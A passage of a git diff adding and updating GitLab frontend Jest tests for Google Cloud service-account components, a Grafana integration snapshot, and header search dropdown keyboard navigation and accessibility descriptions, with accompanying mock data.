+describe('NoGcpProjects component', () => { + let wrapper; + + const findAlert = () => wrapper.findComponent(GlAlert); + const findButton = () => wrapper.findComponent(GlButton); + + beforeEach(() => { + wrapper = mount(NoGcpProjects); + }); + + afterEach(() => { + wrapper.destroy(); + }); + + it('contains alert', () => { + expect(findAlert().exists()).toBe(true); + }); + + it('contains relevant text', () => { + expect(findAlert().props('title')).toBe(NoGcpProjects.i18n.title); + expect(findAlert().text()).toContain(NoGcpProjects.i18n.description); + }); + + it('contains create gcp project button', () => { + const button = findButton(); + expect(button.text()).toBe(NoGcpProjects.i18n.createLabel); + expect(button.attributes('href')).toBe('https://console.cloud.google.com/projectcreate'); + }); +}); diff --git a/spec/frontend/google_cloud/components/home_spec.js b/spec/frontend/google_cloud/components/home_spec.js new file mode 100644 index 00000000000..9b4c3a79f11 --- /dev/null +++ b/spec/frontend/google_cloud/components/home_spec.js @@ -0,0 +1,61 @@ +import { shallowMount } from '@vue/test-utils'; +import { GlTab, GlTabs } from '@gitlab/ui'; +import Home from '~/google_cloud/components/home.vue'; +import ServiceAccountsList from '~/google_cloud/components/service_accounts_list.vue'; + +describe('google_cloud Home component', () => { + let wrapper; + + const findTabs = () => wrapper.findComponent(GlTabs); + const findTabItems = () => findTabs().findAllComponents(GlTab); + const findTabItemsModel = () => + findTabs() + .findAllComponents(GlTab) + .wrappers.map((x) => ({ + title: x.attributes('title'), + disabled: x.attributes('disabled'), + })); + + const TEST_HOME_PROPS = { + serviceAccounts: [{}, {}], + createServiceAccountUrl: '#url-create-service-account', + emptyIllustrationUrl: '#url-empty-illustration', + }; + + beforeEach(() => { + const propsData = { + screen: 'home', + ...TEST_HOME_PROPS, + }; + wrapper = shallowMount(Home, { propsData }); + }); + + afterEach(() => { + wrapper.destroy(); + }); + + describe('google_cloud App tabs', () => { + it('should contain tabs', () => { + expect(findTabs().exists()).toBe(true); + }); + + it('should contain three tab items', () => { + expect(findTabItemsModel()).toEqual([ + { title: 'Configuration', disabled: undefined }, + { title: 'Deployments', disabled: '' }, + { title: 'Services', disabled: '' }, + ]); + }); + + describe('configuration tab', () => { + it('should contain service accounts component', () => { + const serviceAccounts = findTabItems().at(0).findComponent(ServiceAccountsList); + expect(serviceAccounts.props()).toEqual({ + list: TEST_HOME_PROPS.serviceAccounts, + createUrl: TEST_HOME_PROPS.createServiceAccountUrl, + emptyIllustrationUrl: TEST_HOME_PROPS.emptyIllustrationUrl, + }); + }); + }); + }); +}); diff --git a/spec/frontend/google_cloud/components/service_accounts_form_spec.js b/spec/frontend/google_cloud/components/service_accounts_form_spec.js new file mode 100644 index 00000000000..5394d0cdaef --- /dev/null +++ b/spec/frontend/google_cloud/components/service_accounts_form_spec.js @@ -0,0 +1,59 @@ +import { shallowMount } from '@vue/test-utils'; +import { GlButton, GlFormGroup, GlFormSelect } from '@gitlab/ui'; +import ServiceAccountsForm from '~/google_cloud/components/service_accounts_form.vue'; + +describe('ServiceAccountsForm component', () => { + let wrapper; + + const findHeader = () => wrapper.find('header'); + const findAllFormGroups = () => wrapper.findAllComponents(GlFormGroup); + const findAllFormSelects = () => wrapper.findAllComponents(GlFormSelect); + const findAllButtons = () => wrapper.findAllComponents(GlButton); + + const propsData = { gcpProjects: [], environments: [], cancelPath: '#cancel-url' }; + + beforeEach(() => { + wrapper = shallowMount(ServiceAccountsForm, { propsData }); + }); + + afterEach(() => { + wrapper.destroy(); + }); + + it('contains header', () => { + expect(findHeader().exists()).toBe(true); + }); + + it('contains GCP project form group', () => { + const formGroup = findAllFormGroups().at(0); + expect(formGroup.exists()).toBe(true); + }); + + it('contains GCP project dropdown', () => { + const select = findAllFormSelects().at(0); + expect(select.exists()).toBe(true); + }); + + it('contains Environments form group', () => { + const formGorup = findAllFormGroups().at(1); + expect(formGorup.exists()).toBe(true); + }); + + it('contains Environments dropdown', () => { + const select = findAllFormSelects().at(1); + expect(select.exists()).toBe(true); + }); + + it('contains Submit button', () => { + const button = findAllButtons().at(0); + expect(button.exists()).toBe(true); + expect(button.text()).toBe(ServiceAccountsForm.i18n.submitLabel); + }); + + it('contains Cancel button', () => { + const button = findAllButtons().at(1); + expect(button.exists()).toBe(true); + expect(button.text()).toBe(ServiceAccountsForm.i18n.cancelLabel); + expect(button.attributes('href')).toBe('#cancel-url'); + }); +}); diff --git a/spec/frontend/google_cloud/components/service_accounts_spec.js b/spec/frontend/google_cloud/components/service_accounts_list_spec.js index 3d097078f03..cdb3f74051c 100644 --- a/spec/frontend/google_cloud/components/service_accounts_spec.js +++ b/spec/frontend/google_cloud/components/service_accounts_list_spec.js @@ -1,6 +1,6 @@ import { mount } from '@vue/test-utils'; import { GlButton, GlEmptyState, GlTable } from '@gitlab/ui'; -import ServiceAccounts from '~/google_cloud/components/service_accounts.vue'; +import ServiceAccountsList from '~/google_cloud/components/service_accounts_list.vue'; describe('ServiceAccounts component', () => { describe('when the project does not have any service accounts', () => { @@ -15,7 +15,7 @@ describe('ServiceAccounts component', () => { createUrl: '#create-url', emptyIllustrationUrl: '#empty-illustration-url', }; - wrapper = mount(ServiceAccounts, { propsData }); + wrapper = mount(ServiceAccountsList, { propsData }); }); afterEach(() => { @@ -48,7 +48,7 @@ describe('ServiceAccounts component', () => { createUrl: '#create-url', emptyIllustrationUrl: '#empty-illustration-url', }; - wrapper = mount(ServiceAccounts, { propsData }); + wrapper = mount(ServiceAccountsList, { propsData }); }); it('shows the title', () => { diff --git a/spec/frontend/grafana_integration/components/__snapshots__/grafana_integration_spec.js.snap b/spec/frontend/grafana_integration/components/__snapshots__/grafana_integration_spec.js.snap index 33e2c0db5e5..9447e7daba8 100644 --- a/spec/frontend/grafana_integration/components/__snapshots__/grafana_integration_spec.js.snap +++ b/spec/frontend/grafana_integration/components/__snapshots__/grafana_integration_spec.js.snap @@ -47,6 +47,7 @@ exports[`grafana integration component default state to match the default snapsh label="Enable authentication" label-for="grafana-integration-enabled" labeldescription="" + optionaltext="(optional)" > <gl-form-checkbox-stub id="grafana-integration-enabled" @@ -62,6 +63,7 @@ exports[`grafana integration component default state to match the default snapsh label="Grafana URL" label-for="grafana-url" labeldescription="" + optionaltext="(optional)" > <gl-form-input-stub id="grafana-url" @@ -74,6 +76,7 @@ exports[`grafana integration component default state to match the default snapsh label="API token" label-for="grafana-token" labeldescription="" + optionaltext="(optional)" > <gl-form-input-stub id="grafana-token" diff --git a/spec/frontend/header_search/components/app_spec.js b/spec/frontend/header_search/components/app_spec.js index 2ea2693a978..3200c6614f1 100644 --- a/spec/frontend/header_search/components/app_spec.js +++ b/spec/frontend/header_search/components/app_spec.js @@ -6,9 +6,17 @@ import HeaderSearchApp from '~/header_search/components/app.vue'; import HeaderSearchAutocompleteItems from '~/header_search/components/header_search_autocomplete_items.vue'; import HeaderSearchDefaultItems from '~/header_search/components/header_search_default_items.vue'; import HeaderSearchScopedItems from '~/header_search/components/header_search_scoped_items.vue'; -import { ENTER_KEY, ESC_KEY } from '~/lib/utils/keys'; +import { SEARCH_INPUT_DESCRIPTION, SEARCH_RESULTS_DESCRIPTION } from '~/header_search/constants'; +import DropdownKeyboardNavigation from '~/vue_shared/components/dropdown_keyboard_navigation.vue'; +import { ENTER_KEY } from '~/lib/utils/keys'; import { visitUrl } from '~/lib/utils/url_utility'; -import { MOCK_SEARCH, MOCK_SEARCH_QUERY, MOCK_USERNAME } from '../mock_data'; +import { + MOCK_SEARCH, + MOCK_SEARCH_QUERY, + MOCK_USERNAME, + MOCK_DEFAULT_SEARCH_OPTIONS, + MOCK_SCOPED_SEARCH_OPTIONS, +} from '../mock_data'; Vue.use(Vuex); @@ -22,9 +30,10 @@ describe('HeaderSearchApp', () => { const actionSpies = { setSearch: jest.fn(), fetchAutocompleteOptions: jest.fn(), + clearAutocomplete: jest.fn(), }; - const createComponent = (initialState) => { + const createComponent = (initialState, mockGetters) => { const store = new Vuex.Store({ state: { ...initialState, @@ -32,6 +41,8 @@ describe('HeaderSearchApp', () => { actions: actionSpies, getters: { searchQuery: () => MOCK_SEARCH_QUERY, + searchOptions: () => MOCK_DEFAULT_SEARCH_OPTIONS, + ...mockGetters, }, }); @@ -50,11 +61,27 @@ describe('HeaderSearchApp', () => { const findHeaderSearchScopedItems = () => wrapper.findComponent(HeaderSearchScopedItems); const findHeaderSearchAutocompleteItems = () => wrapper.findComponent(HeaderSearchAutocompleteItems); + const findDropdownKeyboardNavigation = () => wrapper.findComponent(DropdownKeyboardNavigation); + const findSearchInputDescription = () => wrapper.find(`#${SEARCH_INPUT_DESCRIPTION}`); + const findSearchResultsDescription = () => wrapper.findByTestId(SEARCH_RESULTS_DESCRIPTION); describe('template', () => { - it('always renders Header Search Input', () => { - createComponent(); - expect(findHeaderSearchInput().exists()).toBe(true); + describe('always renders', () => { + beforeEach(() => { + createComponent(); + }); + + it('Header Search Input', () => { + expect(findHeaderSearchInput().exists()).toBe(true); + }); + + it('Search Input Description', () => { + expect(findSearchInputDescription().exists()).toBe(true); + }); + + it('Search Results Description', () => { + expect(findSearchResultsDescription().exists()).toBe(true); + }); }); describe.each` @@ -66,9 +93,9 @@ describe('HeaderSearchApp', () => { `('Header Search Dropdown', ({ showDropdown, username, showSearchDropdown }) => { describe(`when showDropdown is ${showDropdown} and current_username is ${username}`, () => { beforeEach(() => { - createComponent(); window.gon.current_username = username; - wrapper.setData({ showDropdown }); + createComponent(); + findHeaderSearchInput().vm.$emit(showDropdown ? 'click' : ''); }); it(`should${showSearchDropdown ? '' : ' not'} render`, () => { @@ -78,31 +105,89 @@ describe('HeaderSearchApp', () => { }); describe.each` - search | showDefault | showScoped | showAutocomplete - ${null} | ${true} | ${false} | ${false} - ${''} | ${true} | ${false} | ${false} - ${MOCK_SEARCH} | ${false} | ${true} | ${true} - `('Header Search Dropdown Items', ({ search, showDefault, showScoped, showAutocomplete }) => { - describe(`when search is ${search}`, () => { - beforeEach(() => { - createComponent({ search }); - window.gon.current_username = MOCK_USERNAME; - wrapper.setData({ showDropdown: true }); - }); - - it(`should${showDefault ? '' : ' not'} render the Default Dropdown Items`, () => { - expect(findHeaderSearchDefaultItems().exists()).toBe(showDefault); + search | showDefault | showScoped | showAutocomplete | showDropdownNavigation + ${null} | ${true} | ${false} | ${false} | ${true} + ${''} | ${true} | ${false} | ${false} | ${true} + ${MOCK_SEARCH} | ${false} | ${true} | ${true} | ${true} + `( + 'Header Search Dropdown Items', + ({ search, showDefault, showScoped, showAutocomplete, showDropdownNavigation }) => { + describe(`when search is ${search}`, () => { + beforeEach(() => { + window.gon.current_username = MOCK_USERNAME; + createComponent({ search }); + findHeaderSearchInput().vm.$emit('click'); + }); + + it(`should${showDefault ? '' : ' not'} render the Default Dropdown Items`, () => { + expect(findHeaderSearchDefaultItems().exists()).toBe(showDefault); + }); + + it(`should${showScoped ? '' : ' not'} render the Scoped Dropdown Items`, () => { + expect(findHeaderSearchScopedItems().exists()).toBe(showScoped); + }); + + it(`should${ + showAutocomplete ? '' : ' not' + } render the Autocomplete Dropdown Items`, () => { + expect(findHeaderSearchAutocompleteItems().exists()).toBe(showAutocomplete); + }); + + it(`should${ + showDropdownNavigation ? '' : ' not' + } render the Dropdown Navigation Component`, () => { + expect(findDropdownKeyboardNavigation().exists()).toBe(showDropdownNavigation); + }); }); + }, + ); - it(`should${showScoped ? '' : ' not'} render the Scoped Dropdown Items`, () => { - expect(findHeaderSearchScopedItems().exists()).toBe(showScoped); + describe.each` + username | showDropdown | expectedDesc + ${null} | ${false} | ${HeaderSearchApp.i18n.searchInputDescribeByNoDropdown} + ${null} | ${true} | ${HeaderSearchApp.i18n.searchInputDescribeByNoDropdown} + ${MOCK_USERNAME} | ${false} | ${HeaderSearchApp.i18n.searchInputDescribeByWithDropdown} + ${MOCK_USERNAME} | ${true} | ${HeaderSearchApp.i18n.searchInputDescribeByWithDropdown} + `('Search Input Description', ({ username, showDropdown, expectedDesc }) => { + describe(`current_username is ${username} and showDropdown is ${showDropdown}`, () => { + beforeEach(() => { + window.gon.current_username = username; + createComponent(); + findHeaderSearchInput().vm.$emit(showDropdown ? 'click' : ''); }); - it(`should${showAutocomplete ? '' : ' not'} render the Autocomplete Dropdown Items`, () => { - expect(findHeaderSearchAutocompleteItems().exists()).toBe(showAutocomplete); + it(`sets description to ${expectedDesc}`, () => { + expect(findSearchInputDescription().text()).toBe(expectedDesc); }); }); }); + + describe.each` + username | showDropdown | search | loading | searchOptions | expectedDesc + ${null} | ${true} | ${''} | ${false} | ${[]} | ${''} + ${MOCK_USERNAME} | ${false} | ${''} | ${false} | ${[]} | ${''} + ${MOCK_USERNAME} | ${true} | ${''} | ${false} | ${MOCK_DEFAULT_SEARCH_OPTIONS} | ${`${MOCK_DEFAULT_SEARCH_OPTIONS.length} default results provided. Use the up and down arrow keys to navigate search results list.`} + ${MOCK_USERNAME} | ${true} | ${''} | ${true} | ${MOCK_DEFAULT_SEARCH_OPTIONS} | ${`${MOCK_DEFAULT_SEARCH_OPTIONS.length} default results provided. Use the up and down arrow keys to navigate search results list.`} + ${MOCK_USERNAME} | ${true} | ${MOCK_SEARCH} | ${false} | ${MOCK_SCOPED_SEARCH_OPTIONS} | ${`Results updated. ${MOCK_SCOPED_SEARCH_OPTIONS.length} results available. Use the up and down arrow keys to navigate search results list, or ENTER to submit.`} + ${MOCK_USERNAME} | ${true} | ${MOCK_SEARCH} | ${true} | ${MOCK_SCOPED_SEARCH_OPTIONS} | ${HeaderSearchApp.i18n.searchResultsLoading} + `( + 'Search Results Description', + ({ username, showDropdown, search, loading, searchOptions, expectedDesc }) => { + describe(`search is ${search}, loading is ${loading}, and showSearchDropdown is ${ + Boolean(username) && showDropdown + }`, () => { + beforeEach(() => { + window.gon.current_username = username; + createComponent({ search, loading }, { searchOptions: () => searchOptions }); + findHeaderSearchInput().vm.$emit(showDropdown ? 'click' : ''); + }); + + it(`sets description to ${expectedDesc}`, () => { + expect(findSearchResultsDescription().text()).toBe(expectedDesc); + }); + }); + }, + ); }); describe('events', () => { @@ -132,36 +217,86 @@ describe('HeaderSearchApp', () => { }); }); - describe('when dropdown is opened', () => { - beforeEach(() => { - wrapper.setData({ showDropdown: true }); + describe('onInput', () => { + describe('when search has text', () => { + beforeEach(() => { + findHeaderSearchInput().vm.$emit('input', MOCK_SEARCH); + }); + + it('calls setSearch with search term', () => { + expect(actionSpies.setSearch).toHaveBeenCalledWith(expect.any(Object), MOCK_SEARCH); + }); + + it('calls fetchAutocompleteOptions', () => { + expect(actionSpies.fetchAutocompleteOptions).toHaveBeenCalled(); + }); + + it('does not call clearAutocomplete', () => { + expect(actionSpies.clearAutocomplete).not.toHaveBeenCalled(); + }); }); - it('onKey-Escape closes dropdown', async () => { - expect(findHeaderSearchDropdown().exists()).toBe(true); - findHeaderSearchInput().vm.$emit('keydown', new KeyboardEvent({ key: ESC_KEY })); + describe('when search is emptied', () => { + beforeEach(() => { + findHeaderSearchInput().vm.$emit('input', ''); + }); - await wrapper.vm.$nextTick(); + it('calls setSearch with empty term', () => { + expect(actionSpies.setSearch).toHaveBeenCalledWith(expect.any(Object), ''); + }); - expect(findHeaderSearchDropdown().exists()).toBe(false); + it('does not call fetchAutocompleteOptions', () => { + expect(actionSpies.fetchAutocompleteOptions).not.toHaveBeenCalled(); + }); + + it('calls clearAutocomplete', () => { + expect(actionSpies.clearAutocomplete).toHaveBeenCalled(); + }); }); }); + }); - describe('onInput', () => { - beforeEach(() => { - findHeaderSearchInput().vm.$emit('input', MOCK_SEARCH); - }); + describe('Dropdown Keyboard Navigation', () => { + beforeEach(() => { + findHeaderSearchInput().vm.$emit('click'); + }); - it('calls setSearch with search term', () => { - expect(actionSpies.setSearch).toHaveBeenCalledWith(expect.any(Object), MOCK_SEARCH); - }); + it('closes dropdown when @tab is emitted', async () => { + expect(findHeaderSearchDropdown().exists()).toBe(true); + findDropdownKeyboardNavigation().vm.$emit('tab'); - it('calls fetchAutocompleteOptions', () => { - expect(actionSpies.fetchAutocompleteOptions).toHaveBeenCalled(); - }); + await wrapper.vm.$nextTick(); + + expect(findHeaderSearchDropdown().exists()).toBe(false); + }); + }); + }); + + describe('computed', () => { + describe('currentFocusedOption', () => { + const MOCK_INDEX = 1; + + beforeEach(() => { + createComponent(); + window.gon.current_username = MOCK_USERNAME; + findHeaderSearchInput().vm.$emit('click'); + }); + + it(`when currentFocusIndex changes to ${MOCK_INDEX} updates the data to searchOptions[${MOCK_INDEX}]`, async () => { + findDropdownKeyboardNavigation().vm.$emit('change', MOCK_INDEX); + await wrapper.vm.$nextTick(); + expect(wrapper.vm.currentFocusedOption).toBe(MOCK_DEFAULT_SEARCH_OPTIONS[MOCK_INDEX]); }); + }); + }); - it('submits a search onKey-Enter', async () => { + describe('Submitting a search', () => { + describe('with no currentFocusedOption', () => { + beforeEach(() => { + createComponent(); + }); + + it('onKey-enter submits a search', async () => { findHeaderSearchInput().vm.$emit('keydown', new KeyboardEvent({ key: ENTER_KEY })); await wrapper.vm.$nextTick(); @@ -169,5 +304,22 @@ describe('HeaderSearchApp', () => { expect(visitUrl).toHaveBeenCalledWith(MOCK_SEARCH_QUERY); }); }); + + describe('with currentFocusedOption', () => { + const MOCK_INDEX = 1; + + beforeEach(() => { + createComponent(); + window.gon.current_username = MOCK_USERNAME; + findHeaderSearchInput().vm.$emit('click'); + }); + + it('onKey-enter clicks the selected dropdown item rather than submitting a search', async () => { + findDropdownKeyboardNavigation().vm.$emit('change', MOCK_INDEX); + await wrapper.vm.$nextTick(); + findHeaderSearchInput().vm.$emit('keydown', new KeyboardEvent({ key: ENTER_KEY })); + expect(visitUrl).toHaveBeenCalledWith(MOCK_DEFAULT_SEARCH_OPTIONS[MOCK_INDEX].url); + }); + }); }); }); diff --git a/spec/frontend/header_search/components/header_search_autocomplete_items_spec.js b/spec/frontend/header_search/components/header_search_autocomplete_items_spec.js index 6b84e63989d..bec0cbc8a5c 100644 --- a/spec/frontend/header_search/components/header_search_autocomplete_items_spec.js +++ b/spec/frontend/header_search/components/header_search_autocomplete_items_spec.js @@ -9,14 +9,14 @@ import { PROJECTS_CATEGORY, SMALL_AVATAR_PX, } from '~/header_search/constants'; -import { MOCK_GROUPED_AUTOCOMPLETE_OPTIONS, MOCK_AUTOCOMPLETE_OPTIONS } from '../mock_data'; +import { MOCK_GROUPED_AUTOCOMPLETE_OPTIONS, MOCK_SORTED_AUTOCOMPLETE_OPTIONS } from '../mock_data'; Vue.use(Vuex); describe('HeaderSearchAutocompleteItems', () => { let wrapper; - const createComponent = (initialState, mockGetters) => { + const createComponent = (initialState, mockGetters, props) => { const store = new Vuex.Store({ state: { loading: false, @@ -30,6 +30,9 @@ describe('HeaderSearchAutocompleteItems', () => { wrapper = shallowMount(HeaderSearchAutocompleteItems, { store, + propsData: { + ...props, + }, }); }; @@ -38,6 +41,7 @@ describe('HeaderSearchAutocompleteItems', () => { }); const findDropdownItems = () => wrapper.findAllComponents(GlDropdownItem); + const findFirstDropdownItem = () => findDropdownItems().at(0); const findDropdownItemTitles = () => findDropdownItems().wrappers.map((w) => w.text()); const findDropdownItemLinks = () => findDropdownItems().wrappers.map((w) => w.attributes('href')); const findGlLoadingIcon = () => wrapper.findComponent(GlLoadingIcon); @@ -69,16 +73,16 @@ describe('HeaderSearchAutocompleteItems', () => { describe('Dropdown items', () => { it('renders item for each option in autocomplete option', () => { - expect(findDropdownItems()).toHaveLength(MOCK_AUTOCOMPLETE_OPTIONS.length); + expect(findDropdownItems()).toHaveLength(MOCK_SORTED_AUTOCOMPLETE_OPTIONS.length); }); it('renders titles correctly', () => { - const expectedTitles = MOCK_AUTOCOMPLETE_OPTIONS.map((o) => o.label); + const expectedTitles = MOCK_SORTED_AUTOCOMPLETE_OPTIONS.map((o) => o.label); expect(findDropdownItemTitles()).toStrictEqual(expectedTitles); }); it('renders links correctly', () => { - const expectedLinks = MOCK_AUTOCOMPLETE_OPTIONS.map((o) => o.url); + const expectedLinks = MOCK_SORTED_AUTOCOMPLETE_OPTIONS.map((o) => o.url); expect(findDropdownItemLinks()).toStrictEqual(expectedLinks); }); }); @@ -104,5 +108,46 @@ describe('HeaderSearchAutocompleteItems', () => { }); }); }); + + describe.each` + currentFocusedOption | isFocused | ariaSelected + ${null} | ${false} | ${undefined} + ${{ html_id: 'not-a-match' }} | ${false} | ${undefined} + ${MOCK_SORTED_AUTOCOMPLETE_OPTIONS[0]} | ${true} | ${'true'} + `('isOptionFocused', ({ currentFocusedOption, isFocused, ariaSelected }) => { + describe(`when currentFocusedOption.html_id is ${currentFocusedOption?.html_id}`, () => { + beforeEach(() => { + createComponent({}, {}, { currentFocusedOption }); + }); + + it(`should${isFocused ? '' : ' not'} have gl-bg-gray-50 applied`, () => { + expect(findFirstDropdownItem().classes('gl-bg-gray-50')).toBe(isFocused); + }); + + it(`sets "aria-selected to ${ariaSelected}`, () => { + expect(findFirstDropdownItem().attributes('aria-selected')).toBe(ariaSelected); + }); + }); + }); + }); + + describe('watchers', () => { + describe('currentFocusedOption', () => { + beforeEach(() => { + createComponent(); + }); + + it('when focused changes to existing element calls scroll into view on the newly focused element', async () => { + const focusedElement = findFirstDropdownItem().element; + const scrollSpy = jest.spyOn(focusedElement, 'scrollIntoView'); + + wrapper.setProps({ currentFocusedOption: MOCK_SORTED_AUTOCOMPLETE_OPTIONS[0] }); + + await wrapper.vm.$nextTick(); + + expect(scrollSpy).toHaveBeenCalledWith(false); + scrollSpy.mockRestore(); + }); + }); }); }); diff --git a/spec/frontend/header_search/components/header_search_default_items_spec.js b/spec/frontend/header_search/components/header_search_default_items_spec.js index ce083d0df72..abcacc487df 100644 --- a/spec/frontend/header_search/components/header_search_default_items_spec.js +++ b/spec/frontend/header_search/components/header_search_default_items_spec.js @@ -10,7 +10,7 @@ Vue.use(Vuex); describe('HeaderSearchDefaultItems', () => { let wrapper; - const createComponent = (initialState) => { + const createComponent = (initialState, props) => { const store = new Vuex.Store({ state: { searchContext: MOCK_SEARCH_CONTEXT, @@ -23,6 +23,9 @@ describe('HeaderSearchDefaultItems', () => { wrapper = shallowMount(HeaderSearchDefaultItems, { store, + propsData: { + ...props, + }, }); }; @@ -32,6 +35,7 @@ describe('HeaderSearchDefaultItems', () => { const findDropdownHeader = () => wrapper.findComponent(GlDropdownSectionHeader); const findDropdownItems = () => wrapper.findAllComponents(GlDropdownItem); + const findFirstDropdownItem = () => findDropdownItems().at(0); const findDropdownItemTitles = () => findDropdownItems().wrappers.map((w) => w.text()); const findDropdownItemLinks = () => findDropdownItems().wrappers.map((w) => w.attributes('href')); @@ -77,5 +81,26 @@ describe('HeaderSearchDefaultItems', () => { }); }); }); + + describe.each` + currentFocusedOption | isFocused | ariaSelected + ${null} | ${false} | ${undefined} + ${{ html_id: 'not-a-match' }} | ${false} | ${undefined} + ${MOCK_DEFAULT_SEARCH_OPTIONS[0]} | ${true} | ${'true'} + `('isOptionFocused', ({ currentFocusedOption, isFocused, ariaSelected }) => { + describe(`when currentFocusedOption.html_id is ${currentFocusedOption?.html_id}`, () => { + beforeEach(() => { + createComponent({}, { currentFocusedOption }); + }); + + it(`should${isFocused ? '' : ' not'} have gl-bg-gray-50 applied`, () => { + expect(findFirstDropdownItem().classes('gl-bg-gray-50')).toBe(isFocused); + }); + + it(`sets "aria-selected to ${ariaSelected}`, () => { + expect(findFirstDropdownItem().attributes('aria-selected')).toBe(ariaSelected); + }); + }); + }); }); }); diff --git a/spec/frontend/header_search/components/header_search_scoped_items_spec.js b/spec/frontend/header_search/components/header_search_scoped_items_spec.js index f0e5e182ec4..a65b4d8b813 100644 --- a/spec/frontend/header_search/components/header_search_scoped_items_spec.js +++ b/spec/frontend/header_search/components/header_search_scoped_items_spec.js @@ -11,7 +11,7 @@ Vue.use(Vuex); describe('HeaderSearchScopedItems', () => { let wrapper; - const createComponent = (initialState) => { + const createComponent = (initialState, props) => { const store = new Vuex.Store({ state: { search: MOCK_SEARCH, @@ -24,6 +24,9 @@ describe('HeaderSearchScopedItems', () => { wrapper = shallowMount(HeaderSearchScopedItems, { store, + propsData: { + ...props, + }, }); }; @@ -32,7 +35,10 @@ describe('HeaderSearchScopedItems', () => { }); const findDropdownItems = () => wrapper.findAllComponents(GlDropdownItem); + const findFirstDropdownItem = () => findDropdownItems().at(0); const findDropdownItemTitles = () => findDropdownItems().wrappers.map((w) => trimText(w.text())); + const findDropdownItemAriaLabels = () => + findDropdownItems().wrappers.map((w) => trimText(w.attributes('aria-label'))); const findDropdownItemLinks = () => findDropdownItems().wrappers.map((w) => w.attributes('href')); describe('template', () => { @@ -52,10 +58,38 @@ describe('HeaderSearchScopedItems', () => { expect(findDropdownItemTitles()).toStrictEqual(expectedTitles); }); + it('renders aria-labels correctly', () => { + const expectedLabels = MOCK_SCOPED_SEARCH_OPTIONS.map((o) => + trimText(`${MOCK_SEARCH} ${o.description} ${o.scope || ''}`), + ); + expect(findDropdownItemAriaLabels()).toStrictEqual(expectedLabels); + }); + it('renders links correctly', () => { const expectedLinks = MOCK_SCOPED_SEARCH_OPTIONS.map((o) => o.url); expect(findDropdownItemLinks()).toStrictEqual(expectedLinks); }); }); + + describe.each` + currentFocusedOption | isFocused | ariaSelected + ${null} | ${false} | ${undefined} + ${{ html_id: 'not-a-match' }} | ${false} | ${undefined} + ${MOCK_SCOPED_SEARCH_OPTIONS[0]} | ${true} | ${'true'} + `('isOptionFocused', ({ currentFocusedOption, isFocused, ariaSelected }) => { + describe(`when currentFocusedOption.html_id is ${currentFocusedOption?.html_id}`, () => { + beforeEach(() => { + createComponent({}, { currentFocusedOption }); + }); + + it(`should${isFocused ? '' : ' not'} have gl-bg-gray-50 applied`, () => { + expect(findFirstDropdownItem().classes('gl-bg-gray-50')).toBe(isFocused); + }); + + it(`sets "aria-selected to ${ariaSelected}`, () => { + expect(findFirstDropdownItem().attributes('aria-selected')).toBe(ariaSelected); + }); + }); + }); }); }); diff --git a/spec/frontend/header_search/mock_data.js b/spec/frontend/header_search/mock_data.js index 915b3a4a678..1d980679547 100644 --- a/spec/frontend/header_search/mock_data.js +++ b/spec/frontend/header_search/mock_data.js @@ -46,22 +46,27 @@ export const MOCK_SEARCH_CONTEXT = { export const MOCK_DEFAULT_SEARCH_OPTIONS = [ { + html_id: 'default-issues-assigned', title: MSG_ISSUES_ASSIGNED_TO_ME, url: `${MOCK_ISSUE_PATH}/?assignee_username=${MOCK_USERNAME}`, }, { + html_id: 'default-issues-created', title: MSG_ISSUES_IVE_CREATED, url: `${MOCK_ISSUE_PATH}/?author_username=${MOCK_USERNAME}`, }, { + html_id: 'default-mrs-assigned', title: MSG_MR_ASSIGNED_TO_ME, url: `${MOCK_MR_PATH}/?assignee_username=${MOCK_USERNAME}`, }, { + html_id: 'default-mrs-reviewer', title: MSG_MR_IM_REVIEWER, url: `${MOCK_MR_PATH}/?reviewer_username=${MOCK_USERNAME}`, }, { + html_id: 'default-mrs-created', title: MSG_MR_IVE_CREATED, url: `${MOCK_MR_PATH}/?author_username=${MOCK_USERNAME}`, }, @@ -69,22 +74,25 @@ export const MOCK_DEFAULT_SEARCH_OPTIONS = [ export const MOCK_SCOPED_SEARCH_OPTIONS = [ { + html_id: 'scoped-in-project', scope: MOCK_PROJECT.name, description: MSG_IN_PROJECT, url: MOCK_PROJECT.path, }, { + html_id: 'scoped-in-group', scope: MOCK_GROUP.name, description: MSG_IN_GROUP, url: MOCK_GROUP.path, }, { + html_id: 'scoped-in-all', description: MSG_IN_ALL_GITLAB, url: MOCK_ALL_PATH, }, ]; -export const MOCK_AUTOCOMPLETE_OPTIONS = [ +export const MOCK_AUTOCOMPLETE_OPTIONS_RES = [ { category: 'Projects', id: 1, @@ -92,19 +100,49 @@ export const MOCK_AUTOCOMPLETE_OPTIONS = [ url: 'project/1', }, { + category: 'Groups', + id: 1, + label: 'MockGroup1', + url: 'group/1', + }, + { category: 'Projects', id: 2, label: 'MockProject2', url: 'project/2', }, { + category: 'Help', + label: 'GitLab Help', + url: 'help/gitlab', + }, +]; + +export const MOCK_AUTOCOMPLETE_OPTIONS = [ + { + category: 'Projects', + html_id: 'autocomplete-Projects-0', + id: 1, + label: 'MockProject1', + url: 'project/1', + }, + { category: 'Groups', + html_id: 'autocomplete-Groups-1', id: 1, label: 'MockGroup1', url: 'group/1', }, { + category: 'Projects', + html_id: 'autocomplete-Projects-2', + id: 2, + label: 'MockProject2', + url: 'project/2', + }, + { category: 'Help', + html_id: 'autocomplete-Help-3', label: 'GitLab Help', url: 'help/gitlab', }, @@ -116,12 +154,16 @@ export const MOCK_GROUPED_AUTOCOMPLETE_OPTIONS = [ data: [ { category: 'Projects', + html_id: 'autocomplete-Projects-0', + id: 1, label: 'MockProject1', url: 'project/1', }, { category: 'Projects', + html_id: 'autocomplete-Projects-2', + id: 2, label: 'MockProject2', url: 'project/2', @@ -133,6 +175,8 @@ export const MOCK_GROUPED_AUTOCOMPLETE_OPTIONS = [ data: [ { category: 'Groups', + html_id: 'autocomplete-Groups-1', + id: 1, label: 'MockGroup1', url: 'group/1', @@ -144,9 +188,41 @@ export const MOCK_GROUPED_AUTOCOMPLETE_OPTIONS = [ data: [ { category: 'Help', + html_id: 'autocomplete-Help-3', + label: 'GitLab Help', url: 'help/gitlab', }, ], }, ]; + +export const MOCK_SORTED_AUTOCOMPLETE_OPTIONS = [ + { + category: 'Projects', + html_id: 'autocomplete-Projects-0', + id: 1, + label: 'MockProject1', + url: 'project/1', + }, + { + category: 'Projects', + html_id: 'autocomplete-Projects-2', + id: 2, + label: 'MockProject2', + url: 'project/2', + }, + { + category: 'Groups', + html_id: 'autocomplete-Groups-1', + id: 1, + label: 'MockGroup1', + url: 'group/1', + }, + { + category: 'Help', + html_id: 'autocomplete-Help-3', + label: 'GitLab Help', + url: 